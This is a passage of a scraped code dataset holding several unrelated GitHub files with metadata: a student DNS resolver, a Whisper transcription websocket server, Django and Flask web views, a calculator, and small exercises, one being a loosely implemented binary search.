geth_poa_cleanup),\n RPC.eth_subscribe: apply_formatter_if(\n is_not_null,\n # original call to eth_subscribe returns a string, needs a dict check\n apply_formatter_if(is_dict, geth_poa_cleanup),\n ),\n },\n )\n return await middleware(make_request, w3)\n","repo_name":"ethereum/web3.py","sub_path":"web3/middleware/geth_poa.py","file_name":"geth_poa.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":4510,"dataset":"github-code","pt":"37"} +{"seq_id":"35918621249","text":"def busca_binaria(seq, x):\n ''' (list, float) -> bool\n retorna a posicao em que x ocorre na lista ordenada,\n ou None caso contrario, usando o algoritmo de busca binaria.\n '''\n t = len(seq)\n m = int(t / 2)\n \n if seq[m] == x:\n return True\n\n if seq[m] > x:\n for i in range(0, m-1):\n if seq[i] == x:\n return True\n if seq[m] < x:\n for i in range(m + 1, len(seq)):\n if seq[i] == x:\n return True\n\n return None\n\n\n# escreva alguns testes da funcao busca_binaria\nseq = [4, 10, 80, 90, 91, 99, 100, 101]\ntestes = [80, 50,101]\n\nfor t in testes:\n pos = busca_binaria(seq, t)\n if pos is None:\n print(\"Nao achei \", t)\n else:\n print(\"Achei \", t)\n\n","repo_name":"brunoparodi/IME-USP-Coursera","sub_path":"Parte02/Aulas/23_02_busca_binaria.py","file_name":"23_02_busca_binaria.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33413865407","text":"import socket\r\nfrom argparse import ArgumentParser\r\nimport binascii\r\nimport random\r\nimport time\r\nfrom datetime import datetime\r\nrandom.seed(1220)\r\ncache = {}\r\n\r\ndef parse_args():\r\n # parse the command line arguments\r\n args = ArgumentParser()\r\n args.add_argument('--host', default='localhost')\r\n args.add_argument('--port', default=20000, type=int)\r\n return args.parse_args()\r\n\r\n# get ip from a response\r\ndef getIP(auth_response):\r\n auth_response=getList(auth_response)\r\n \r\n lenQNameInt = int(auth_response[12], base=16)\r\n lenTldInt = int(auth_response[12+lenQNameInt+1], base=16)\r\n StartofAnswer = 12+lenQNameInt+1+lenTldInt +1 + 5\r\n record_list=[]\r\n i=0\r\n numAns = int(auth_response[7], base=16)\r\n # get ip address from response from server\r\n while(i < numAns):\r\n ipAndttl = [] # format: [ipaddress,ttl]\r\n ans = StartofAnswer +11\r\n if int(auth_response[ans], base=16) == 4:\r\n a = int(auth_response[ans+1], base=16)\r\n b = int(auth_response[ans+2], base=16)\r\n c = int(auth_response[ans+3], base=16)\r\n d = int(auth_response[ans+4], base=16)\r\n ansIP = str(a) + '.' + str(b) + '.' + str(c) + '.' + str(d) \r\n ipAndttl.append(ansIP)\r\n \r\n ipAndttl.append(int(auth_response[ans-3]+auth_response[ans-2], base=16))\r\n StartofAnswer = ans+int(auth_response[ans], base=16)+1\r\n record_list.append(ipAndttl)\r\n i+=1\r\n ipAddr = random.choice(record_list)\r\n print(\"HTTP Server IP address:\",ipAddr[0])\r\n return ipAddr\r\n\r\n# return domain name of a request\r\ndef getHostname(message):\r\n \r\n message =getList(binascii.hexlify(message).decode(\"utf-8\"))\r\n qname = []\r\n lenQNameInt = int(message[12], base=16)\r\n lenTldInt= int(message[12+lenQNameInt+1], base=16)\r\n for i in range(lenQNameInt):\r\n qname.append(bytearray.fromhex(message[13+i]).decode())\r\n qname.append(\".\")\r\n for i in range(lenTldInt):\r\n qname.append(bytearray.fromhex(message[12+lenQNameInt+2+i]).decode())\r\n return \"\".join(qname)\r\n\r\n# Creates a server, recieves requests from client, and sends back response to client\r\ndef start_udp_server(host, port):\r\n # create a server socket with the following specifications\r\n # AF_INET -> IPv4 socket\r\n # SOCK_DGRAM -> UDP protocol\r\n with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as server_socket:\r\n\r\n # bind the socket to a OS port\r\n server_socket.bind((host, port))\r\n\r\n # start receiving udp packets in an infinite loop\r\n while True:\r\n # data, addr = recvfrom(n)\r\n # n -> buffer size, i.e., number of max bytes to receive\r\n # data -> the message received from the client\r\n # addr -> the address of the client\r\n\r\n message, addr = server_socket.recvfrom(1024)\r\n time_recv_from_client = time.time()\r\n\r\n print(\"Domain:\",getHostname(message))\r\n hostname =getHostname(message)\r\n in_cache=0\r\n # determine if host name in cache\r\n if hostname in cache:\r\n ts = time.time()\r\n diff = int(ts)-cache[hostname][2]\r\n if diff < cache[hostname][1]:\r\n in_cache = 1\r\n if in_cache == 1:\r\n print(\"IN CACHE\")\r\n response = cache[hostname]\r\n getIP(response[0])\r\n else:\r\n print(\"NOT IN CACHE\")\r\n response = getAuthIp(message) # DNS Response with format[response,ttl]\r\n ts = time.time()\r\n #store[response,ttl,ts] into cache\r\n cache[hostname] = [response[0],response[1],int(ts)]\r\n \r\n # send response back to client\r\n time_send_to_client = time.time()\r\n server_socket.sendto(binascii.unhexlify(response[0]), addr)\r\n \r\n print(\"Total time to resolve host name: \", time_send_to_client - time_recv_from_client)\r\n\r\n# # Send DNS requests to servers\r\ndef start_udp_client(server_host, server_port, message):\r\n\r\n # create a client socket with the following specifications\r\n # AF_INET -> IPv4 socket\r\n # SOCK_DGRAM -> UDP protocol\r\n with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as client_socket:\r\n\r\n # send message to server at address (server_host, server_port)\r\n \r\n # ----- message from client -----\r\n # message = \"BB AA 00 00 00 01 00 00 00 00 00 00 03 74 6D 7A 03 63 6f 6d 00 00 01 00 01\" \r\n # message = message.replace(\" \", \"\").replace(\"\\n\", \"\")\r\n # client_socket.sendto(binascii.unhexlify(message), (server_host, server_port))\r\n client_socket.sendto(message, (server_host, server_port))\r\n # print(\"DNS request sent\")\r\n message, addr = client_socket.recvfrom(2048)\r\n \r\n return binascii.hexlify(message).decode(\"utf-8\")\r\n\r\n# Helper function used to unpack responses\r\ndef getList(hex):\r\n octets = [hex[i:i+2] for i in range(0, len(hex), 2)]\r\n return octets\r\n\r\n# Given a DNS response returns an IP Address to TLD or AUTH servers\r\ndef getServerIP(res):\r\n lenQNameInt = int(res[12], base=16)\r\n lenTldInt = int(res[12+lenQNameInt+1], base=16)\r\n StartofAnswer = 12+lenQNameInt+1+lenTldInt +1 + 5\r\n \r\n auth_num = int(res[9], base=16)\r\n index = StartofAnswer\r\n i=0\r\n while(i < auth_num):\r\n end_index = index +11 + int(res[index+11], base=16)\r\n index = end_index+1\r\n i+=1\r\n\r\n record_list=[]\r\n\r\n i=0\r\n add_num = int(res[11], base=16)\r\n\r\n while(i < add_num):\r\n addr_lenth_index = index +11 \r\n if int(res[addr_lenth_index], base=16) == 4:\r\n a = int(res[addr_lenth_index+1], base=16)\r\n b = int(res[addr_lenth_index+2], base=16)\r\n c = int(res[addr_lenth_index+3], base=16)\r\n d = int(res[addr_lenth_index+4], base=16)\r\n ipAd = str(a) + '.' + str(b) + '.' + str(c) + '.' + str(d) \r\n record_list.append(ipAd)\r\n index = addr_lenth_index+int(res[addr_lenth_index], base=16)+1\r\n i+=1\r\n return random.choice(record_list)\r\n\r\n# Send request to ROOT, TLD, and AUTH servers, returns AUTH response and TTL\r\ndef getAuthIp(message):\r\n # ------ DNS -> ROOT -------\r\n # ROOT DNS IPs\r\n ipArr = [\"198.41.0.4\", \"199.9.14.201\", \"192.33.4.12\", \"199.7.91.13\", \"192.203.230.10\", \"192.5.5.241\", \"192.112.36.4,\", \"198.97.190.53\", \"192.36.148.17\", \"192.58.128.30\", \"193.0.14.129\", \"199.7.83.42\", \"202.12.27.33\"]\r\n\r\n root_server_host = random.choice(ipArr)\r\n print(\"Root server IP address: \",root_server_host)\r\n server_port = 53\r\n \r\n # RTT from local DNS to ROOT\r\n time_sent_root = time.time() \r\n root_response = start_udp_client(root_server_host, server_port,message)\r\n time_recv_root = time.time()\r\n print(\"RRT_ROOT: \", time_recv_root - time_sent_root)\r\n\r\n root_response = getList(root_response)\r\n\r\n add_num = int(root_response[11], base=16)\r\n if add_num <1:\r\n print(\"NO TLD RECIEVED\"), len(root_response)\r\n else:\r\n tldIP=getServerIP(root_response)\r\n print(\"TLD server IP address: \", tldIP)\r\n\r\n # ----- DNS -> TLD ------\r\n # RTT from local DNS to TLD\r\n time_sent_tld = time.time() \r\n tld_response = start_udp_client(tldIP, server_port,message)\r\n time_recv_tld = time.time() \r\n print(\"RRT_TLD: \", time_recv_tld - time_sent_tld)\r\n\r\n tld_response = getList(tld_response)\r\n auth_ip = getServerIP(tld_response)\r\n print(\"Authoritative server IP address\",auth_ip)\r\n\r\n # ----- DNS -> AUTH ------\r\n # RTT from local DNS to AUTH\r\n time_sent_auth = time.time() \r\n auth_response = start_udp_client(auth_ip, server_port,message)\r\n time_recv_auth = time.time()\r\n print(\"RRT_AUTH: \", time_recv_auth - time_sent_auth)\r\n # print(\"Number of Answers:\", int(auth_response[7], base=16))\r\n # print(\"Number of authority records:\", int(auth_response[9], base=16))\r\n # print(\"Number of additional records:\", int(auth_response[11], base=16))\r\n \r\n #get random final ip address\r\n ttl = int(auth_response[-16:-12], base=16)\r\n result= auth_response\r\n getIP(auth_response)\r\n\r\n print(\"TTL: \", ttl, \" seconds\")\r\n\r\n return [result,ttl]\r\n\r\nif __name__ == '__main__':\r\n args = parse_args()\r\n start_udp_server(args.host, args.port)\r\n \r\n","repo_name":"wanweny/ECS152A-Computer-Networks","sub_path":"project2/PartC.py","file_name":"PartC.py","file_ext":"py","file_size_in_byte":8401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5062497431","text":"# https://leetcode.com/problems/set-matrix-zeroes/\n\n\n\nclass Solution:\n def setZeroes(self, matrix: List[List[int]]) -> None:\n \"\"\"\n Do not return anything, modify matrix in-place instead.\n \"\"\"\n z = []\n m = len(matrix)\n n = len(matrix[0])\n for i in range(m):\n for j in range(n):\n if matrix[i][j]==0:\n z = z + [(i,j)]\n for k in z:\n for a in range(m):\n matrix[a][k[1]]=0\n for a in range(n):\n matrix[k[0]][a]=0\n \n ","repo_name":"bmk15897/Striver-Sheet","sub_path":"arrays-1.py","file_name":"arrays-1.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33863539325","text":"# -*- coding: utf-8 -*-\r\n'''\r\n@createBy : xiaowu \r\n@date : 2019/10/22 14:16:41\r\n'''\r\n\r\nimport multiprocessing as mp\r\n\r\ndef job(q):\r\n res = 0\r\n \r\n for i in range(12):\r\n res += i+i**2+i**3\r\n q.put(res)\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n queue = mp.Queue()\r\n p1 = mp.Process(target=job,args=(queue,))\r\n p1.start()\r\n for _ in range(1000):\r\n if(not queue.empty()):\r\n print('has')\r\n else:\r\n print('emtpy')","repo_name":"xiaowu5759/xwspider","sub_path":"doban_spider/try_test/processing_mp_test.py","file_name":"processing_mp_test.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71522432427","text":"from django.shortcuts import render,redirect,render_to_response\nfrom django.contrib import messages\nfrom .models import Libro,Autor\n\n# Create your views here.\ndef index(request):\n libros = Libro.objects.all()\n context = {\n \"libros\" : libros\n }\n return render(request,'index.html',context)\n\ndef addBook(request):\n if request.method == 'POST':\n Libro.objects.create(title=request.POST[\"title\"],desc=request.POST[\"desc\"])\n return redirect('/')\n\n\ndef books(request,idbook):\n request.session[\"idbook\"] = idbook\n libro = Libro.objects.get(id=idbook)\n filtered_entry = Autor.objects.all()\n for exclude_entry in libro.autores.all():\n filtered_entry = filtered_entry.exclude(id=exclude_entry.id)\n context = {\n \"libro\" : libro,\n \"addAutors\" : filtered_entry\n }\n return render(request,'books.html',context)\n\ndef addAuthor(request):\n if request.method == 'GET':\n idbook = request.session[\"idbook\"]\n if request.GET[\"author\"] != \"0\":\n idbook = request.session[\"idbook\"]\n Autor.objects.get(id=request.GET[\"author\"]).libros.add(Libro.objects.get(id=idbook))\n else:\n messages.info(request,\"No se ha seleccionado ningun Autor\")\n return redirect(f'books/{idbook}')\n\n\n\ndef authorIndex(request):\n author = Autor.objects.all()\n context = {\n \"authors\" : author\n }\n return render(request,'authors.html',context)\n\ndef addNewAuthor(request):\n if request.method == 'POST':\n Autor.objects.create(first_name=request.POST[\"first_name\"],last_name=request.POST[\"last_name\"],notas=request.POST[\"notes\"])\n return redirect('/author')\n\n\ndef authors(request,idauthor):\n request.session[\"idauthor\"] = idauthor\n autor = Autor.objects.get(id=idauthor)\n filtered_entry = Libro.objects.all()\n for exclude_entry in autor.libros.all():\n filtered_entry = filtered_entry.exclude(id=exclude_entry.id)\n context = {\n \"autores\" : autor,\n \"books\" : filtered_entry\n }\n return render(request,'author.html',context)\n\ndef addNewBook(request):\n if request.method == 'GET':\n idauthor = request.session[\"idauthor\"]\n if request.GET[\"book\"] != \"0\":\n idauthor = request.session[\"idauthor\"]\n Libro.objects.get(id=request.GET[\"book\"]).autores.add(Autor.objects.get(id=idauthor))\n return redirect(f'author/{idauthor}')\n else:\n messages.info(request,\"No se ha seleccionado ningun libro\")\n return redirect(f'author/{idauthor}')\n ","repo_name":"eorozco-c/Books_Authors","sub_path":"apps/books_authors_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15863740505","text":"\r\n\r\ndef suma ():\r\n resultado = float(op1)+float(op2)\r\n return resultado\r\n\r\ndef resta ():\r\n resultado = float(op1)-float(op2)\r\n return resultado\r\n\r\ndef multiplicacion ():\r\n resultado = float(op1)*float(op2)\r\n return resultado\r\n\r\ndef division ():\r\n if (op2 != \"0\"):\r\n resultado = float(op1)/float(op2)\r\n return resultado\r\n else : \r\n print (\"Operacion no válida\")\r\n\r\ndef exponencial ():\r\n resultado = float(op1)**float(op2)\r\n return resultado\r\n\r\nop1 = \"\"\r\nwhile (op1 != \"q\"):\r\n print(\"\"\"\r\n\r\n CALCULADORA\r\n Las operaciones disponibles son las siguientes:\r\n\r\n Suma (+)\r\n Resta (-)\r\n Multiplicacion(*)\r\n Divison(/)\r\n Exponenciales (^)\r\n Raiz cuadrada (por favor, siga el formato: operador = ^ y segundo operando = 0.5)\r\n\r\n Pulse q para salir de la aplicacion\r\n \"\"\")\r\n try:\r\n op1 = input(\"Introduzca el primer operando: \")\r\n if (op1 == \"q\"):\r\n break\r\n oper = input (\"Introduzca el operador: \")\r\n op2 = input (\"Introduzca el segundo operando: \")\r\n\r\n float(op1)\r\n float(op2)\r\n except:\r\n print(\"Operando incorrecto\")\r\n continue\r\n \r\n if (oper== str(\"+\")) :\r\n res = suma()\r\n elif (oper== str(\"-\")) :\r\n res = resta()\r\n elif (oper== str(\"*\")) :\r\n res = multiplicacion()\r\n elif (oper== str(\"/\")) :\r\n res = division ()\r\n elif (oper== str(\"^\")) : \r\n res = exponencial()\r\n else :\r\n print(\"Operacion no soportada/Operador no válido\")\r\n\r\n if res != None : \r\n print (\"El resultado de la operacion \" + op1 + oper + op2 + \" es \" + str(res))\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"LuzJP/BecasDevNet","sub_path":"calculadora.py","file_name":"calculadora.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2252700972","text":"import time\nimport sounddevice as sd\nimport numpy as np\n\nimport whisper\n\nimport asyncio\nimport queue\nimport sys\n\nimport websockets\nimport socket\nfrom threading import Thread, Event\nfrom collections import deque\n\nserver_host = '127.0.0.1'\nserver_port = 8081\n\n# SETTINGS\n# the model used for transcription. https://github.com/openai/whisper#available-models-and-languages\nMODEL_TYPE=\"tiny.en\"\n\n# pre-set the language to avoid autodetection\nLANGUAGE=\"English\"\n\n# this is the base chunk size the audio is split into in samples. blocksize / 16000 = chunk length in seconds.\nBLOCKSIZE=24678\n\n# should be set to the lowest sample amplitude that the speech in the audio material has\nSILENCE_THRESHOLD=1000\n\n# number of samples in one buffer that are allowed to be higher than threshold\nSILENCE_RATIO=2\n\nHAS_DATA_WAITING=False\n\nFIRST_RUN=True\n\nDEBUG=False\n\nlatest_data = \"\"\n\nglobal_ndarray = None\nmodel = whisper.load_model(MODEL_TYPE)\n\nfrom collections import deque\n\nprint(\"Starting server...\")\n\nif DEBUG:\n\tprint(\"Silence threshold division\", SILENCE_THRESHOLD/15)\n\nasync def inputstream_generator():\n\t\"\"\"Generator that yields blocks of input data as NumPy arrays.\"\"\"\n\tq_in = asyncio.Queue()\n\tloop = asyncio.get_event_loop()\n\n\tdef callback(indata, frame_count, time_info, status):\n\t\tloop.call_soon_threadsafe(q_in.put_nowait, (indata.copy(), status))\n\n\tstream = sd.InputStream(samplerate=16000, channels=1, dtype='int16', blocksize=BLOCKSIZE, callback=callback)\n\twith stream:\n\t\twhile True:\n\t\t\tindata, status = await q_in.get()\n\t\t\tyield indata, status\n\n\nasync def process_audio_buffer():\n\tglobal global_ndarray\n\tglobal HAS_DATA_WAITING\n\tglobal latest_data\n\tasync for indata, status in inputstream_generator():\n\n\t\tindata_flattened = abs(indata.flatten())\n\n\t\tif DEBUG:\n\t\t\tprint(\"\\nConcatenated buffers:\", np.average((indata_flattened[-100:-1])))\n\n\t\t# discard buffers that contain mostly silence\n\t\tif(np.asarray(np.where(indata_flattened > SILENCE_THRESHOLD)).size < SILENCE_RATIO) and not HAS_DATA_WAITING:\n\t\t\tif DEBUG:\n\t\t\t\tprint(\"\\nFlattened:\", np.asarray(np.where(indata_flattened > SILENCE_THRESHOLD)).size, \"Queued:\", HAS_DATA_WAITING)\n\t\t\tcontinue\n\n\t\tif (global_ndarray is not None):\n\t\t\tglobal_ndarray = np.concatenate((global_ndarray, indata), dtype='int16')\n\t\telse:\n\t\t\tglobal_ndarray = indata\n\n\t\t# concatenate buffers if the end of the current buffer is not silent\n\t\tif (np.average((indata_flattened[-100:-1])) > SILENCE_THRESHOLD/15):\n\t\t\tprint(\"Recording audio, waiting for silence...\")\n\t\t\tif DEBUG:\n\t\t\t\tprint(\"\\nStill waiting for silence, concatenating...\")\n\t\t\t\tprint(\"Average:\", np.average((indata_flattened[-100:-1])))\n\t\t\tHAS_DATA_WAITING = True\n\t\t\tcontinue\n\t\telse:\n\t\t\tHAS_DATA_WAITING = False\n\t\t\tprint(\"\\nTranscribing...\")\n\t\t\tstart_time = time.perf_counter()\n\t\t\tlocal_ndarray = global_ndarray.copy()\n\t\t\tglobal_ndarray = None\n\t\t\tindata_transformed = local_ndarray.flatten().astype(np.float32) / 32768.0\n\t\t\tresult = model.transcribe(indata_transformed, language=LANGUAGE)\n\t\t\tprint(\"Output:\", result[\"text\"])\n\t\t\tlatest_data = result[\"text\"]\n\t\t\tend_time = time.perf_counter()\n\t\t\tprint(f\"Transcribed in {end_time - start_time:0.4f} seconds\\n\")\n\n\t\tdel local_ndarray\n\t\tdel indata_flattened\n\n\n\nasync def main():\n\tprint('\\nActivating wire...\\n')\n\n\taudio_task = asyncio.create_task(process_audio_buffer())\n\n\twhile True:\n\t\tawait asyncio.sleep(1)\n\taudio_task.cancel()\n\ttry:\n\t\tawait audio_task\n\texcept asyncio.CancelledError:\n\t\tprint('\\nwire was cancelled')\n\nif __name__ == \"__main__\":\n\tasync def stt_server(websocket, path):\n\t\tglobal latest_data\n\t\twhile True:\n\t\t\t\tawait websocket.send(latest_data)\n\n\tdef start_loop(loop, server):\n\t\tloop.run_until_complete(server)\n\t\tloop.run_forever()\n\n\tnew_loop = asyncio.new_event_loop()\n\tstart_server = websockets.serve(stt_server, server_host, server_port, loop=new_loop)\n\tt = Thread(target=start_loop, args=(new_loop, start_server))\n\tt.kill = Event()\n\tt.start()\n\ttime.sleep(2)\n\tprint(f\"Websocket server started at ws://localhost:{server_port}\")\n\n\ttry:\n\t\tasyncio.run(main())\n\texcept KeyboardInterrupt:\n\t\tsys.exit('\\nInterrupted by user')\n\t\tt.kill.set()\n\t\tt.join()\n","repo_name":"Zetaphor/whisper-realtime","sub_path":"openai-whisper-realtime.py","file_name":"openai-whisper-realtime.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30915710989","text":"import requests\nimport datetime\nimport geopy.distance\nimport sys\n\nfrom math import floor\nfrom flask import Flask, request, make_response, jsonify\nfrom db_service import *\n\nfrom fcm_service import send_notification\nfrom tokens_service import save_token, reset_tokens, get_tokens\n\napp = Flask(__name__)\n\nconn = connect()\nset_db(conn, INIT_CMD)\n\ntry:\n payments_base_url = os.environ['PAYMENTS_URL']\nexcept KeyError:\n payments_base_url = 'https://payments-server-develop.herokuapp.com/'\n\n\n@app.route('/')\ndef hello():\n response = 'db: UP\\n'\n use_db(conn, 'SELECT NOW();')\n return response\n\n\n@app.route('/feedback', methods=['POST'])\ndef new_feedback():\n body = request.json\n if use_db(conn, count_bookings_query(body['post_id'], body['user_id']))[0] == 0:\n return make_response({\"error\": \"No puedes calificar este alojamiento si nunca reservaste ahi\"}, 400)\n feedback_id, post_id, user_id, date, comment, stars, = use_db(conn, add_feedback_query(body['user_id'],\n body['post_id'],\n body['date'],\n body.get('comment'),\n body.get('stars')\n ))\n return make_response(\n jsonify(\n feedback_id=feedback_id,\n post_id=post_id,\n user_id=user_id,\n date=date.strftime('%Y-%m-%d'),\n coment=comment,\n stars=stars\n )\n )\n\n\n@app.route('/feedback')\ndef get_feedbacks():\n user_id = request.args.get('user_id')\n post_id = request.args.get('post_id')\n date = request.args.get('date')\n mandatoryComment = request.args.get('mandatoryComment', False)\n mandatoryStars = request.args.get('mandatoryStars', False)\n feedbacks = []\n for feedback_id, post_id, user_id, date, comment, stars in use_db(conn, get_feedback_query(user_id,\n post_id,\n date,\n mandatoryComment == True,\n mandatoryStars == True\n ), many=True):\n feedbacks.append({'feedback_id': feedback_id, 'post_id': post_id,\n 'user_id': user_id, 'date': date.strftime('%Y-%m-%d'),\n 'comment': comment, 'stars': stars})\n return make_response(jsonify(feedbacks), 200)\n\n\n@app.route('/posts', methods=['DELETE'])\ndef reset_posts():\n set_db(conn, RESET_CMD)\n return make_response(\"DB Reseted\", 200)\n\n\n@app.route('/posts', methods=['POST'])\ndef new_post():\n body = request.json\n response = requests.post(payments_base_url + 'room',\n json={\"creatorId\": body['wallet_id'], \"price\": body['price']},\n headers={'Content-Type': 'application/json'})\n\n if response.status_code == 200:\n print('new room: ', response.json()['roomTransaction'])\n roomTransaction = response.json()['roomTransaction']\n body['room_transaction'] = roomTransaction\n post_id, availability_dates, availability_type, bathrooms, bedrooms, beds, beds_distribution, date, description, guests, images, is_blocked, location, price, services, title, type, user_id, wallet_id, room_transaction, = use_db(\n conn, add_post_query(body))\n return make_response(\n jsonify(id=post_id, user_id=user_id, price=price, date=date.strftime('%Y-%m-%d'), is_blocked=is_blocked,\n type=type, title=title, description=description, availability_dates=availability_dates,\n availability_type=availability_type,\n bathrooms=bathrooms, bedrooms=bedrooms, beds=beds, beds_distribution=beds_distribution,\n guests=guests, images=images,\n location=location, services=services, wallet_id=wallet_id, room_transaction=room_transaction), 201)\n\n\n@app.route('/posts/')\ndef visualize_post(post_id):\n post_id, availability_dates, availability_type, bathrooms, bedrooms, beds, beds_distribution, date, description, guests, images, is_blocked, location, price, services, title, type, user_id, wallet_id, room_transaction, = use_db(\n conn, get_post_query(post_id))\n return make_response(\n jsonify(id=post_id, user_id=user_id, price=price, date=date.strftime('%Y-%m-%d'), is_blocked=is_blocked,\n type=type, title=title, description=description, availability_dates=availability_dates,\n availability_type=availability_type,\n bathrooms=bathrooms, bedrooms=bedrooms, beds=beds, beds_distribution=beds_distribution, guests=guests,\n images=images,\n location=location, services=services, wallet_id=wallet_id, room_transaction=room_transaction), 200)\n\n\n@app.route('/posts/', methods=['PATCH'])\ndef edit_post(post_id):\n body = request.json\n body.pop(\"id\", None)\n if body.get('price'):\n roomTransaction = use_db(conn, get_post_transaction_query(post_id))[0]\n owner_w_id = use_db(conn, get_post_owner_wallet_id_query(post_id))[0]\n response = requests.patch(payments_base_url + 'room',\n json={'wallet_id': owner_w_id, 'room_transaction': roomTransaction,\n 'price': body.get('price')})\n if response.status_code != 200:\n return make_response(response.content, 500)\n post_id, availability_dates, availability_type, bathrooms, bedrooms, beds, beds_distribution, date, description, guests, images, is_blocked, location, price, services, title, type, user_id, wallet_id, room_transaction, = use_db(\n conn, edit_post_cmd(post_id, **body))\n return make_response(\n jsonify(id=post_id, user_id=user_id, price=price, date=date.strftime('%Y-%m-%d'), is_blocked=is_blocked,\n type=type, title=title, description=description, availability_dates=availability_dates,\n availability_type=availability_type,\n bathrooms=bathrooms, bedrooms=bedrooms, beds=beds, beds_distribution=beds_distribution, guests=guests,\n images=images,\n location=location, services=services,\n wallet_id=wallet_id, room_transaction=room_transaction, status=\"ok\"), 201)\n\n\n@app.route('/posts/', methods=['DELETE'])\ndef delete_post(post_id):\n roomTransaction = use_db(conn, get_post_transaction_query(post_id))[0]\n owner_w_id = use_db(conn, get_post_owner_wallet_id_query(post_id))[0]\n response = requests.delete(payments_base_url + 'room',\n json={'room_transaction': roomTransaction, 'wallet_id': owner_w_id})\n if response.status_code != 200:\n return make_response(response.content, 500)\n post_id, availability_dates, availability_type, bathrooms, bedrooms, beds, beds_distribution, date, description, guests, images, is_blocked, location, price, services, title, type, user_id, wallet_id, room_transaction, = use_db(\n conn, delete_post_query(post_id))\n return make_response(\n jsonify(id=post_id, user_id=user_id, price=price, date=date.strftime('%Y-%m-%d'), is_blocked=is_blocked,\n type=type, title=title, description=description, availability_dates=availability_dates,\n availability_type=availability_type,\n bathrooms=bathrooms, bedrooms=bedrooms, beds=beds, beds_distribution=beds_distribution, guests=guests,\n images=images,\n location=location, services=services,\n wallet_id=wallet_id, room_transaction=room_transaction), 200)\n\ndef get_posts_query_wrapper(user_id, type, minPrice, maxPrice, bodyBeginDate, bodyEndDate, lng, lat, hide_user_id ,maxDistance, includeBlocked):\n posts = use_db(conn, get_posts_query(user_id, type, minPrice, maxPrice, hide_user_id), many=True)\n parsed_posts = []\n for post_id, availability_dates, availability_type, bathrooms, bedrooms, beds, beds_distribution, date, description, guests, images, is_blocked, location, price, services, title, type, user_id, wallet_id, room_transaction, in posts:\n closeEnough = True\n if lng and lat:\n maxDistance = float(maxDistance) if maxDistance else 100.0\n postCoords = (float(location['lng']), float(location['lat']))\n searchCoords = (float(lng), float(lat))\n distance = geopy.distance.geodesic(postCoords, searchCoords).km\n closeEnough = distance <= maxDistance\n overlap = False\n availableRoom = True\n if bodyBeginDate and bodyEndDate:\n overlap, = use_db(conn, overlapping_bookings_count_query(post_id, bodyBeginDate, bodyEndDate))\n avBeginDate = datetime.datetime.strptime(availability_dates['start_date'], '%Y-%m-%d')\n avEndDate = datetime.datetime.strptime(availability_dates['end_date'], '%Y-%m-%d')\n beginDate = datetime.datetime.strptime(bodyBeginDate, '%Y-%m-%d')\n endDate = datetime.datetime.strptime(bodyEndDate, '%Y-%m-%d')\n availableRoom = avBeginDate <= beginDate <= avEndDate and avBeginDate <= endDate <= avEndDate\n if not overlap and availableRoom and closeEnough and (not is_blocked or includeBlocked):\n parsed_posts.append({\"id\": post_id, \"user_id\": user_id, \"price\": price, \"date\": date.strftime('%Y-%m-%d'),\n \"is_blocked\": is_blocked, \"type\": type, \"title\": title, \"description\": description,\n \"availability_dates\": availability_dates, \"availability_type\": availability_type,\n \"bathrooms\": bathrooms, \"bedrooms\": bedrooms, \"beds\": beds,\n \"beds_distribution\": beds_distribution, \"recommended\" : False,\n \"guests\": guests, \"images\": images, \"location\": location,\n \"services\": services, \"wallet_id\": wallet_id, \"room_transaction\": room_transaction})\n return parsed_posts\n\ndef loose_filters(minPrice, maxPrice, beginDate, endDate, maxDistance):\n loosenMinPrice = None\n loosenMaxPrice = None\n loosenBeginDate = None\n loosenEndDate = None\n loosenMaxDistance = None\n if beginDate and endDate:\n beginDate = datetime.datetime.strptime(beginDate, '%Y-%m-%d')\n endDate = datetime.datetime.strptime(endDate, '%Y-%m-%d')\n diffDays = (endDate - beginDate).days\n loosenBeginDate = beginDate + datetime.timedelta(days=floor(diffDays/5))\n loosenEndDate = endDate - datetime.timedelta(days=floor(diffDays/5))\n loosenBeginDate = loosenBeginDate.strftime('%Y-%m-%d')\n loosenEndDate = loosenEndDate.strftime('%Y-%m-%d')\n if maxDistance:\n loosenMaxDistance = maxDistance * 2\n if minPrice:\n loosenMinPrice = float(minPrice) * 0.75\n if maxPrice:\n loosenMaxPrice = float(maxPrice) * 1.25\n return loosenMinPrice, loosenMaxPrice, loosenBeginDate, loosenEndDate, loosenMaxDistance\n\n\n@app.route('/posts')\ndef search_posts():\n user_id = request.args.get('user_id')\n type = request.args.get('type')\n if type: type = type.lower()\n minPrice = request.args.get('minPrice')\n maxPrice = request.args.get('maxPrice')\n bodyBeginDate = request.args.get('beginDate')\n bodyEndDate = request.args.get('endDate')\n lng = request.args.get('lng')\n lat = request.args.get('lat')\n maxDistance = request.args.get('maxDistance')\n hide_user_id = request.args.get('hide_user_id')\n includeRecommendations = request.args.get('includeRecommendations', False)\n includeBlocked = bool(request.args.get('includeBlocked', False))\n searchPosts = get_posts_query_wrapper(\n user_id, type, minPrice, maxPrice, bodyBeginDate, bodyEndDate, lng, lat, hide_user_id, maxDistance, includeBlocked\n )\n post_ids = request.args.get('post_ids')\n if post_ids:\n searchPosts = [post for post in searchPosts if str(post.get('id')) in post_ids.split(',')]\n recommendedPosts = []\n if bool(includeRecommendations):\n minPrice, maxPrice, bodyBeginDate, bodyEndDate, maxDistance = 